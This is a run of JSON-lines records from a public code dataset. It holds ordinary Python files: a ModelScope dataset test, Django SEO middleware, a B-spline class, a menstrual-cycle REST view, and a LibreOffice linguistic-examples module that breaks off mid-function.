SequenceClassificationPreprocessor(\r\n nlp_model.model_dir,\r\n first_sequence='premise',\r\n second_sequence=None)\r\n ms_ds_train = MsDataset.load(\r\n 'xcopa',\r\n subset_name='translation-et',\r\n namespace='damotest',\r\n split='test')\r\n tf_dataset = ms_ds_train.to_tf_dataset(\r\n batch_size=5,\r\n shuffle=True,\r\n preprocessors=preprocessor,\r\n drop_remainder=True)\r\n print(next(iter(tf_dataset)))\r\n\r\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\r\n @require_torch\r\n def test_to_torch_dataset_img(self):\r\n ms_image_train = MsDataset.load(\r\n 'fixtures_image_utils', namespace='damotest', split='test')\r\n pt_dataset = ms_image_train.to_torch_dataset(\r\n preprocessors=ImgPreprocessor(image_path='file'))\r\n import torch\r\n dataloader = torch.utils.data.DataLoader(pt_dataset, batch_size=5)\r\n print(next(iter(dataloader)))\r\n\r\n @unittest.skipUnless(test_level() >= 2, 'skip test in current test level')\r\n @require_tf\r\n def test_to_tf_dataset_img(self):\r\n import tensorflow as tf\r\n tf.compat.v1.enable_eager_execution()\r\n ms_image_train = MsDataset.load(\r\n 'fixtures_image_utils', namespace='damotest', split='test')\r\n tf_dataset = ms_image_train.to_tf_dataset(\r\n batch_size=5,\r\n shuffle=True,\r\n preprocessors=ImgPreprocessor(image_path='file'),\r\n drop_remainder=True,\r\n )\r\n print(next(iter(tf_dataset)))\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n", "repo_name": "sdjamesliu/alldata", "sub_path": "ai/modelscope-versions/modelscope-master/tests/msdatasets/test_ms_dataset.py", "file_name": "test_ms_dataset.py", "file_ext": "py", "file_size_in_byte": 5576, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "modelscope.preprocessors.base.Preprocessor", "line_number": 13, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 29, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 34, "usage_type": "attribute"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 38, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 38, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 36, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 36, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 44, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 44, "usage_type": "name"}, {"api_name": "modelscope.utils.constant.DEFAULT_DATASET_NAMESPACE", "line_number": 46, "usage_type": "name"}, {"api_name": "modelscope.utils.constant.DownloadMode.FORCE_REDOWNLOAD", "line_number": 47, "usage_type": "attribute"}, {"api_name": "modelscope.utils.constant.DownloadMode", "line_number": 47, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 42, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 42, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 54, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 54, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 52, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 52, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 61, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 61, "usage_type": "name"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 63, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 63, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 59, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 59, "usage_type": "call"}, {"api_name": "modelscope.models.Model.from_pretrained", "line_number": 75, "usage_type": "call"}, {"api_name": "modelscope.models.Model", "line_number": 75, "usage_type": "name"}, {"api_name": "modelscope.preprocessors.SequenceClassificationPreprocessor", "line_number": 76, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 81, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 88, "usage_type": "attribute"}, {"api_name": "unittest.skipUnless", "line_number": 71, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 71, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.require_torch", "line_number": 72, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.enable_eager_execution", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 95, "usage_type": "attribute"}, {"api_name": "modelscope.models.Model.from_pretrained", "line_number": 97, "usage_type": "call"}, {"api_name": "modelscope.models.Model", "line_number": 97, "usage_type": "name"}, {"api_name": "modelscope.preprocessors.SequenceClassificationPreprocessor", "line_number": 98, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 102, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 102, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 91, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 91, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.require_tf", "line_number": 92, "usage_type": "name"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 117, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 117, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 122, "usage_type": "attribute"}, {"api_name": "unittest.skipUnless", "line_number": 114, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 114, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.require_torch", "line_number": 115, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.enable_eager_execution", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 129, "usage_type": "attribute"}, {"api_name": "modelscope.msdatasets.MsDataset.load", "line_number": 130, "usage_type": "call"}, {"api_name": "modelscope.msdatasets.MsDataset", "line_number": 130, "usage_type": "name"}, {"api_name": "unittest.skipUnless", "line_number": 125, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.test_level", "line_number": 125, "usage_type": "call"}, {"api_name": "modelscope.utils.test_utils.require_tf", "line_number": 126, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 142, "usage_type": "call"}]} +{"seq_id": "41957573142", "text": "import re\nfrom django_seo_js import settings\nfrom django_seo_js.backends import SelectedBackend\nfrom django_seo_js.helpers import request_should_be_ignored\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\nclass UserAgentMiddleware(SelectedBackend):\n def __init__(self, *args, **kwargs):\n super(UserAgentMiddleware, self).__init__(*args, **kwargs)\n regex_str = \"|\".join(settings.USER_AGENTS)\n regex_str = \".*?(%s)\" % regex_str\n self.USER_AGENT_REGEX = re.compile(regex_str, re.IGNORECASE)\n\n def process_request(self, request):\n if not settings.ENABLED:\n return\n\n if request_should_be_ignored(request):\n return\n\n if \"HTTP_USER_AGENT\" not in request.META:\n return\n\n if not self.USER_AGENT_REGEX.match(request.META[\"HTTP_USER_AGENT\"]):\n return\n\n url = self.backend.build_absolute_uri(request)\n try:\n return self.backend.get_response_for_url(url, request)\n except Exception as e:\n logger.exception(e)\n", "repo_name": "skoczen/django-seo-js", "sub_path": "django_seo_js/middleware/useragent.py", "file_name": "useragent.py", "file_ext": "py", "file_size_in_byte": 1051, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 200, "dataset": "github-code", "pt": "86", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "django_seo_js.backends.SelectedBackend", "line_number": 10, "usage_type": "name"}, {"api_name": "django_seo_js.settings.USER_AGENTS", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django_seo_js.settings", "line_number": 13, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 15, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django_seo_js.settings.ENABLED", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django_seo_js.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "django_seo_js.helpers.request_should_be_ignored", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "716015685", "text": "import numpy as np\nimport scipy.interpolate as si\n\nclass BSplineVolume:\n def __init__(self, Parameters):\n ''' Constructor of BSplineVolume \\n\n Takes QuESo::Parameters as input.\n '''\n self.Order = Parameters.Order()\n NumElements = Parameters.NumberOfElements()\n LowerBoundXYZ = Parameters.LowerBoundXYZ()\n UpperBoundXYZ = Parameters.UpperBoundXYZ()\n LowerBoundUVW = Parameters.LowerBoundUVW()\n UpperBoundUVW = Parameters.UpperBoundUVW()\n knot_vector_type = Parameters.GetGlobalSettings().GetString(\"knot_vector_type\")\n if( knot_vector_type == \"open_knot_vector\" ):\n open_knot_vector = True\n elif( knot_vector_type == \"non_open_knot_vector\" ):\n open_knot_vector = False\n else:\n message = \"BSplineVolume :: __init__ :: Given 'knot_vector_type': '\" + knot_vector_type\n message += \"' not valid. Available options are: 'open_knot_vector' and 'non_open_knot_vector'.\"\n raise Exception(message)\n self.spline_u = self.__construct_b_spline(\n self.Order[0], NumElements[0], LowerBoundXYZ[0], UpperBoundXYZ[0], LowerBoundUVW[0], UpperBoundUVW[0], open_knot_vector)\n self.spline_v = self.__construct_b_spline(\n self.Order[1], NumElements[1], LowerBoundXYZ[1], UpperBoundXYZ[1], LowerBoundUVW[1], UpperBoundUVW[1], open_knot_vector)\n self.spline_w = self.__construct_b_spline(\n self.Order[2], NumElements[2], LowerBoundXYZ[2], UpperBoundXYZ[2], LowerBoundUVW[2], UpperBoundUVW[2], open_knot_vector)\n\n def GetSpline(self, Index):\n if( Index == 0 ):\n return self.spline_u\n elif( Index == 1 ):\n return self.spline_v\n elif( Index == 2 ):\n return self.spline_w\n else:\n raise Exception(\"BSplineVolume :: GetSpline :: Index out of scope.\")\n\n def ControlPoints(self):\n ''' Returns control points of B-Spline volume in a list.\n The point indices are linearized and can be accessed the following:\n\n cps = self.ControlPoints() \\n\n count = 0 \\n\n for i_w in range(NumberControlPointsInW()):\n for i_v in range(NumberControlPointsInV()):\n for i_u in range(NumberControlPointsInU()):\n point = cps[count] \\n\n count += 1\n '''\n cps = []\n for z in self.spline_w.c:\n for y in self.spline_v.c:\n for x in self.spline_u.c:\n cps.append( [x, y, z] )\n return cps\n\n def ControlPointsMatrix(self):\n ''' Returns control points of B-Spline volume in a matrix.\n Points can be accessed as:\n\n cps = self.ControlPoints() \\n\n for i_w in range(NumberControlPointsInW()):\n for i_v in range(NumberControlPointsInV()):\n for i_u in range(NumberControlPointsInU()):\n point = cps[i_u, i_v, i_w]\n '''\n n_cps_u = self.NumberControlPointsInU()\n n_cps_v = self.NumberControlPointsInV()\n n_cps_w = self.NumberControlPointsInW()\n n_cps = n_cps_u*n_cps_v*n_cps_w\n\n cps = np.zeros(n_cps*3).reshape(n_cps_u, n_cps_v, n_cps_w, 3)\n for i_z, z in enumerate(self.spline_w.c):\n for i_y, y in enumerate(self.spline_v.c):\n for i_x, x in enumerate(self.spline_u.c):\n cps[i_x, i_y, i_z] = [x, y, z]\n\n return cps\n\n def KnotsU(self):\n ''' KnotsU \\n\n Returns knot vector along u- (x) direction.\n '''\n return self.spline_u.t.tolist()\n\n def KnotsV(self):\n ''' KnotsV \\n\n Returns knot vector along v- (y) direction.\n '''\n return self.spline_v.t.tolist()\n\n def KnotsW(self):\n ''' KnotsW \\n\n Returns knot vector along w- (z) direction.\n '''\n return self.spline_w.t.tolist()\n\n def PolynomialOrder(self):\n ''' PolynomialOrder \\n\n Returns polynomial order of b-spline volume: [p_x, p_y, p_z]\n '''\n return self.Order\n\n def NumberControlPointsInU(self):\n ''' NumberControlPointsInU \\n\n Returns number of control points in u- (x) direction.\n '''\n return len(self.spline_u.c)\n\n def NumberControlPointsInV(self):\n ''' NumberControlPointsInV \\n\n Returns number of control points in v- (y) direction.\n '''\n return len(self.spline_v.c)\n\n def NumberControlPointsInW(self):\n ''' NumberControlPointsInW \\n\n Returns number of control points in w- (z) direction.\n '''\n return len(self.spline_w.c)\n\n def __construct_b_spline(self, Order, NumElements, LowerBoundX, UpperBoundX, LowerBoundU, UpperBoundU, OpenKnotVector=False):\n delta_u = (UpperBoundU-LowerBoundU)/NumElements\n\n if OpenKnotVector:\n knots_u = np.array( (Order+1)*[LowerBoundU] )\n knots_u = np.append( knots_u, (Order+1)*[UpperBoundU] )\n else:\n knots_u = np.array( [LowerBoundU - (Order-i)*delta_u for i in range(Order+1)] )\n knots_u = np.append( knots_u, [(UpperBoundU + i*delta_u) for i in range(Order+1)] )\n\n delta_x = (UpperBoundX-LowerBoundX) / Order\n center = (UpperBoundX+LowerBoundX) / 2.0\n cps_x = np.arange(LowerBoundX, UpperBoundX+0.5*delta_x, delta_x )\n\n if not OpenKnotVector:\n cps_x = [ val - (Order-1)*(center-val) / (NumElements) for val in cps_x ]\n\n spline_u = si.BSpline(knots_u, cps_x, Order, extrapolate=False)\n knots_u_to_insert = np.arange(LowerBoundU+delta_u, UpperBoundU-0.5*delta_u, delta_u)\n\n for knot in knots_u_to_insert:\n spline_u = si.insert(knot, spline_u)\n\n num_cps = len(spline_u.t) - Order - 1\n spline_u.c = spline_u.c[:num_cps]\n\n return spline_u\n\n", "repo_name": "manuelmessmer/QuESo", "sub_path": "queso/python_scripts/b_spline_volume.py", "file_name": "b_spline_volume.py", "file_ext": "py", "file_size_in_byte": 5909, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "86", "api": [{"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 137, "usage_type": "call"}, {"api_name": "scipy.interpolate.BSpline", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 142, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 143, "usage_type": "call"}, {"api_name": "scipy.interpolate.insert", "line_number": 146, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 146, "usage_type": "name"}]} +{"seq_id": "17676691696", "text": "from rest_framework import permissions, status,response\nfrom rest_framework.generics import CreateAPIView,UpdateAPIView\nfrom menstrual_cycle.serializers import MenstrualCycleSerializer\nfrom menstrual_cycle.models import MenstrualCycle\nfrom helpers.utils import period_start_dates\nfrom django.db import IntegrityError\n\n\n\nclass CreateCycleView(CreateAPIView,UpdateAPIView,):\n permission_classes = (permissions.IsAuthenticated,)\n \"\"\"Creates new menstrual cycle info in the system\"\"\"\n serializer_class = MenstrualCycleSerializer\n\n\n def get_queryset(self):\n user = MenstrualCycle.objects.filter(owner=self.request.user)\n if not user:\n return response.Response({\"invalid_user\":\"no record found\"}, status=status.HTTP_400_BAD_REQUEST)\n return user\n\n def get_object(self):\n queryset = self.get_queryset()\n return queryset[0]\n\n def post(self, request):\n user_data = request.data\n serializer = self.serializer_class(data=user_data)\n Last_period_date = user_data.get('Last_period_date', '')\n Cycle_average = user_data.get('Cycle_average', '')\n Period_average = user_data.get('Period_average', '')\n Start_date = user_data.get('Start_date', '')\n End_date = user_data.get('End_date', '')\n \n if not serializer.is_valid():\n return response.Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n owner =request.user\n name=owner.fullname\n period_dates = period_start_dates(Last_period_date,Cycle_average,Start_date,End_date)\n try:\n cycle,created = MenstrualCycle.objects.update_or_create(Last_period_date=Last_period_date,Cycle_average=Cycle_average,\n Period_average=Period_average,Start_date=Start_date,\n End_date=End_date,owner=owner\n )\n print(cycle)\n cycle.save()\n except IntegrityError:\n return response.Response({'message':'record for user already exists'}, status=status.HTTP_400_BAD_REQUEST)\n return response.Response({'name':name,'total_created_cycles':len(period_dates)}, status=status.HTTP_201_CREATED)\n\n def put(self, request, **kwargs):\n update_period = self.get_object()\n serializer = MenstrualCycleSerializer(data=request.data, partial=True)\n self.check_object_permissions(request,update_period)\n if serializer.is_valid():\n serializer.instance = update_period\n serializer.save()\n user_data = serializer.data\n Last_period_date = user_data.get('Last_period_date', '')\n Cycle_average = user_data.get('Cycle_average', '')\n Start_date = user_data.get('Start_date', '')\n End_date = user_data.get('End_date', '')\n period_dates = period_start_dates(Last_period_date,Cycle_average,Start_date,End_date)\n owner =request.user\n name=owner.fullname\n return response.Response({'name':name,'total_created_cycles':len(period_dates)}, status=status.HTTP_201_CREATED)\n return response.Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n ", "repo_name": "Ladeologun/HEALTHAPI", "sub_path": "menstrual_cycle/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "rest_framework.generics.CreateAPIView", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 11, "usage_type": "name"}, {"api_name": "menstrual_cycle.serializers.MenstrualCycleSerializer", "line_number": 13, "usage_type": "name"}, {"api_name": "menstrual_cycle.models.MenstrualCycle.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "menstrual_cycle.models.MenstrualCycle.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "menstrual_cycle.models.MenstrualCycle", "line_number": 17, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 19, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 19, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 36, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 36, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 36, "usage_type": "name"}, {"api_name": "helpers.utils.period_start_dates", "line_number": 39, "usage_type": "call"}, {"api_name": "menstrual_cycle.models.MenstrualCycle.objects.update_or_create", "line_number": 41, "usage_type": "call"}, {"api_name": "menstrual_cycle.models.MenstrualCycle.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "menstrual_cycle.models.MenstrualCycle", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.IntegrityError", "line_number": 47, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 48, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 48, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 48, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 48, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 49, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 49, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 49, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 49, "usage_type": "name"}, {"api_name": "menstrual_cycle.serializers.MenstrualCycleSerializer", "line_number": 53, "usage_type": "call"}, {"api_name": "helpers.utils.period_start_dates", "line_number": 63, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 66, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 66, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 66, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 66, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 67, "usage_type": "call"}, {"api_name": "rest_framework.response", "line_number": 67, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 67, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "41893268852", "text": "# -*- coding: Latin-1 -*-\n\n\"\"\"\nGrab phonology or interlinear examples and insert them.\n\nThis module exports:\n ExServices\n EXTYPE_PHONOLOGY\n EXTYPE_INTERLINEAR\n\"\"\"\nimport logging\n\nfrom lingt.access.writer import outputmanager\nfrom lingt.access.writer import search\nfrom lingt.access.writer import styles\nfrom lingt.access.writer.ex_updater import ExUpdater\nfrom lingt.access.writer.uservars import Prefix, UserVars\nfrom lingt.access.xml.interlin_reader import InterlinReader\nfrom lingt.access.xml.phon_reader import PhonReader\nfrom lingt.app import exceptions\nfrom lingt.app.data import fileitemlist\nfrom lingt.app.data import lingex_structs\nfrom lingt.ui.common.messagebox import MessageBox\nfrom lingt.utils import util\n\nlogger = logging.getLogger(\"lingt.app.lingexamples\")\n\n# type of linguistic example\nEXTYPE_PHONOLOGY = 'phonology'\nEXTYPE_INTERLINEAR = 'interlinear'\n\nclass ExServices:\n \"\"\"Services that can conveniently be called from other modules.\"\"\"\n\n def __init__(self, exType, unoObjs):\n self.exType = exType\n self.unoObjs = unoObjs\n if self.exType == EXTYPE_PHONOLOGY:\n USERVAR_PREFIX = Prefix.PHONOLOGY\n else:\n USERVAR_PREFIX = Prefix.INTERLINEAR\n self.userVars = UserVars(\n USERVAR_PREFIX, unoObjs.document, logger)\n self.msgbox = MessageBox(unoObjs)\n self.settings = ExSettings(self.exType, self.unoObjs, self.userVars)\n self.operations = ExOperations(\n self.exType, self.unoObjs, self.userVars, self.settings)\n self.replacingRefs = True # find and replace ref numbers\n logger.debug(\"ExGrabber init() finished\")\n\n def verifyRefnums(self):\n \"\"\"Raises an exception if there are duplicates or no ref nums found.\"\"\"\n try:\n self.operations.readData(force_read=True)\n except exceptions.MessageError as exc:\n self.msgbox.displayExc(exc)\n raise exceptions.DataNotFoundError(\"No data found.\")\n if self.operations.duplicate_refnums:\n MAX_NUMS_IN_MESSAGE = 5\n refnums = util.natural_sort(self.operations.duplicate_refnums)\n refnumsString = \", \".join(refnums[:MAX_NUMS_IN_MESSAGE])\n additionalRefs = len(refnums) - MAX_NUMS_IN_MESSAGE\n if additionalRefs > 0:\n refnumsString += \", ...%d more.\" % additionalRefs\n message = exceptions.interpolate_message(\n \"The following Ref Numbers have duplicates: %s\", refnumsString)\n if self.exType == EXTYPE_INTERLINEAR:\n message += exceptions.interpolate_message(\n \"\\n\\nEither change the numbers or, if they are in \"\n \"different texts, add a prefix for each text.\\n\"\n \"Press OK to use these settings anyway.\")\n raise exceptions.DataInconsistentError(message)\n\n def getAllRefnums(self):\n \"\"\"Returns an iterable of all ref numbers in the data.\n Items are in the order that they were read from the file.\n \"\"\"\n try:\n self.operations.readData()\n return util.natural_sort(\n [ex.refText for ex in self.operations.examplesDict.values()])\n except exceptions.MessageError as exc:\n self.msgbox.displayExc(exc)\n raise exceptions.DataNotFoundError(\"No data found.\")\n\n def insertByRefnum(self, refTextRough):\n try:\n self.operations.readData()\n if not refTextRough.strip():\n message = exceptions.interpolate_message(\n \"Please enter a ref number.\")\n raise exceptions.ChoiceProblem(\n self.operations.appendSuggestions(message))\n logger.debug(\"do the insertion.\")\n self.operations.insertEx(refTextRough, False, False)\n except exceptions.MessageError as exc:\n self.msgbox.displayExc(exc)\n\n def setUpdateExamples(self, newVal):\n self.replacingRefs = not newVal\n\n def isUpdatingExamples(self):\n return not self.replacingRefs\n\n def findNext(self, searchFromBeginning):\n \"\"\"Returns true if a ref number is found.\"\"\"\n logger.debug(\"findNext(%s)\", searchFromBeginning)\n oldFoundString = self.operations.getFoundString()\n newFoundString = self.operations.doSearch(\n self.replacingRefs, searchFromBeginning)\n if oldFoundString and not newFoundString:\n return bool(oldFoundString)\n return bool(newFoundString)\n\n def replace(self, searchFromBeginning):\n \"\"\"Returns True if another ref number is found after replacing.\"\"\"\n logger.debug(util.funcName('begin'))\n if (self.exType == EXTYPE_INTERLINEAR and self.isUpdatingExamples() and\n not self.settings.getOutconfig().makeOuterTable):\n self.msgbox.display(\n \"To update examples, 'Outer table' must be \"\n \"marked in Interlinear Settings.\")\n return False\n if not self.operations.getFoundString():\n return self.findNext(searchFromBeginning)\n refnumFound = self.operations.getFoundString()\n try:\n self.operations.readData()\n if self.replacingRefs:\n self.operations.insertEx(refnumFound, True, False)\n else:\n self.operations.updateEx(refnumFound)\n self.operations.doSearch(self.replacingRefs, False)\n except exceptions.MessageError as exc:\n self.msgbox.displayExc(exc)\n return bool(self.operations.getFoundString())\n\n def replaceAll(self):\n \"\"\"Replace all #ref no's or update all existing examples.\"\"\"\n if (self.exType == EXTYPE_INTERLINEAR and self.isUpdatingExamples() and\n not self.settings.getOutconfig().makeOuterTable):\n self.msgbox.display(\n \"To update examples, 'Outer table' must be \"\n \"marked in Interlinear Settings.\")\n return\n try:\n self.operations.readData()\n repeater = ExRepeater(\n self.msgbox, self.settings, self.operations,\n self.replacingRefs)\n repeater.replaceAll()\n except exceptions.MessageError as exc:\n self.msgbox.displayExc(exc)\n\n def addExampleNumbers(self):\n self.operations.addExampleNumbers()\n\n\nclass ExRepeater:\n \"\"\"For replacing or updating all.\"\"\"\n def __init__(self, msgbox, settings, operations, replacingRefs):\n self.msgbox = msgbox\n self.settings = settings\n self.operations = operations\n self.replacingRefs = replacingRefs\n self.prevRefUpdated = \"\"\n self.repeatedCount = 0\n self.replacementsCount = 0\n self.messagesDisplayed = [] # don't keep displaying for updating all\n\n def replaceAll(self):\n startFromBeginning = True\n self.prevRefUpdated = \"\"\n self.repeatedCount = 0\n self.replacementsCount = 0\n while True:\n self.operations.doSearch(\n self.replacingRefs, startFromBeginning, True)\n refnumFound = self.operations.getFoundString()\n if not refnumFound:\n break\n startFromBeginning = False\n try:\n self.replaceAndAsk(refnumFound)\n except exceptions.UserInterrupt:\n break\n except exceptions.MessageError as exc:\n if exc.msg not in self.messagesDisplayed:\n self.messagesDisplayed.append(exc.msg)\n if not self.msgbox.displayOkCancel(exc.msg, *exc.msg_args):\n # User pressed Cancel\n break\n plural = \"\" if self.replacementsCount == 1 else \"s\"\n if self.replacingRefs:\n self.msgbox.display(\n \"Replaced %d example%s.\", self.replacementsCount, plural)\n else:\n self.msgbox.display(\n \"Updated %d example%s.\", self.replacementsCount, plural)\n\n def replaceAndAsk(self, refnumFound):\n if self.replacingRefs:\n self.operations.insertEx(refnumFound, True, False)\n self.replacementsCount += 1\n else:\n self.operations.updateEx(refnumFound)\n self.replacementsCount += 1\n if refnumFound == self.prevRefUpdated:\n self.askInterrupt(refnumFound)\n else:\n self.prevRefUpdated = refnumFound\n self.repeatedCount = 1\n\n def askInterrupt(self, refnumFound):\n \"\"\"Updated the same number twice. It might be an infinite loop.\"\"\"\n logger.debug(\"Repeated ex %d times\", self.repeatedCount)\n self.repeatedCount += 1\n MAX_REPETITIONS = 5\n dummy_div, mod = divmod(self.repeatedCount, MAX_REPETITIONS)\n if self.repeatedCount > 0 and mod == 0:\n refnumDisplay = refnumFound.strip()\n if not self.msgbox.displayOkCancel(\n \"Updated '%s' %d times in a row. Keep going?\",\n refnumDisplay, self.repeatedCount):\n raise exceptions.UserInterrupt()\n\n\nclass ExOperations:\n \"\"\"Core operations for this module.\n Calls the Access layer for input and output.\n \"\"\"\n def __init__(self, exType, unoObjs, userVars, settings):\n self.exType = exType\n self.unoObjs = unoObjs\n self.userVars = userVars\n self.settings = settings\n self.search = search.ExampleSearch(unoObjs)\n self.interlinManager = None\n if self.exType == EXTYPE_PHONOLOGY:\n self.outputManager = outputmanager.PhonMgr(\n unoObjs, self.settings.getStyles())\n else:\n self.interlinManager = outputmanager.InterlinMgr(\n unoObjs, self.settings.getStyles())\n self.outputManager = self.interlinManager\n self.exUpdater = ExUpdater(\n unoObjs, self.outputManager, self.userVars.VAR_PREFIX)\n self.msgbox = MessageBox(unoObjs)\n self.examplesDict = None\n self.suggestions = []\n self.duplicate_refnums = []\n\n def addExampleNumbers(self):\n if self.interlinManager:\n self.interlinManager.addExampleNumbers()\n\n def doSearch(self, replacingRefs, startFromBeginning, findingAll=False):\n if replacingRefs:\n self.search.findRefNumber(startFromBeginning, findingAll)\n else:\n self.search.findRefCharStyle(\n self.settings.getStyles().getNames()['ref'],\n startFromBeginning, findingAll)\n return self.getFoundString()\n\n def getFoundString(self):\n return self.search.getFoundString()\n\n def readData(self, force_read=False):\n \"\"\"Read examples from data files.\"\"\"\n if force_read:\n self.examplesDict = None\n self.settings.reset()\n if self.examplesDict is None:\n logger.debug(\"Getting examples dict\")\n if self.exType == EXTYPE_PHONOLOGY:\n fileReader = PhonReader(\n self.unoObjs, self.userVars, self.settings.getInconfig())\n else:\n fileReader = InterlinReader(\n self.unoObjs, self.userVars, self.settings.getInconfig())\n self.examplesDict = fileReader.read()\n self.suggestions = fileReader.getSuggestions()\n self.duplicate_refnums = fileReader.getDuplicateRefNumbers()\n\n def insertEx(self, refTextRough, deleteRefNum, updatingEx):\n \"\"\"Set updatingEx to True if updating the example.\"\"\"\n logger.debug(util.funcName('begin', 